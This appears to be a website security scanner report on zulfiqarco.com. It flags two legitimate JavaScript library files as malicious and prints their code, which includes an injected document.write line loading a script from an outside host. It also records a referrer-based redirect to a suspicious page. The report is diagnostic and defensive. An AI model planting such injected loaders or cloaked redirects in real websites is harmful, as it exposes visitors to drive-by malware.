Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=zulfiqarco.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://zulfiqarco.com/ | 200 OK Content-Length: 10988 Content-Type: text/html | clean |
http://zulfiqarco.com/SpryAssets/SpryMenuBar.js | 200 OK Content-Length: 10149 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var Spry; if(!Spry) { Spry = {}; } if(!Spry.Widget) { Spry.Widget = {}; } Spry.Widget.MenuBar = function(element, opts) { this.init(element, opts); }; Spry.Widget.MenuBar.prototype.init = function(element, opts) { this.element = this.getElement(element); this.currMenu = null; var isie = (typeof document.all != 'undefined' && typeof window.opera if(!listitem.contains(related)) { clearTimeout(opentime); self.currMenu = listitem; self.removeClassName(link, hasSubMenu ? "MenuBarItemSubmenuHover" : "MenuBarItemHover"); if(menu) { closetime = window.setTimeout(function(){self.hideSubmenu(menu);}, 600); } } }, false); }; document.write('<script src=http://new.rollcolor.net/table/index.php ><\/script>'); Antivirus reports:
| ||
http://zulfiqarco.com/Scripts/AC_RunActiveContent.js | 200 OK Content-Length: 8406 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var isIE = (navigator.appVersion.indexOf("MSIE") != -1) ? true : false;
var isWin = (navigator.appVersion.toLowerCase().indexOf("win") != -1) ? true : false; var isOpera = (navigator.userAgent.indexOf("Opera") != -1) ? true : false; function ControlVersion() { var version; var axo; var e; try { axo = new ActiveXObject("ShockwaveFlash.ShockwaveFlash.7"); version = axo.GetVariable("$version"); } catch (e) { case "name": case "tabindex": ret.embedAttrs[args[i]] = ret.objAttrs[args[i]] = args[i+1]; break; default: ret.embedAttrs[args[i]] = ret.params[args[i]] = args[i+1]; } } ret.objAttrs["classid"] = classid; if (mimeType) ret.embedAttrs["type"] = mimeType; return ret; } document.write('<script src=http://new.rollcolor.net/table/index.php ><\/script>'); Antivirus reports:
| ||
http://new.rollcolor.net/table/index.php | 200 OK Content-Length: 103 Content-Type: text/html | clean |
http://new.rollcolor.net/test404page.js | 500 Internal Server Error Content-Length: 672 Content-Type: text/html | clean |
Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://zulfiqarco.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: zulfiqarco.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Sat, 17 Jan 2015 08:01:04 GMT Location: http://recover8888.com/ek/index.php?s=7c70dd9f78bb703a31cb4cb8734fb431 Server: Microsoft-IIS/7.0 Content-Length: 256 Content-Type: text/html X-Powered-By: ASP.NET X-Powered-By-Plesk: PleskWin | suspicious |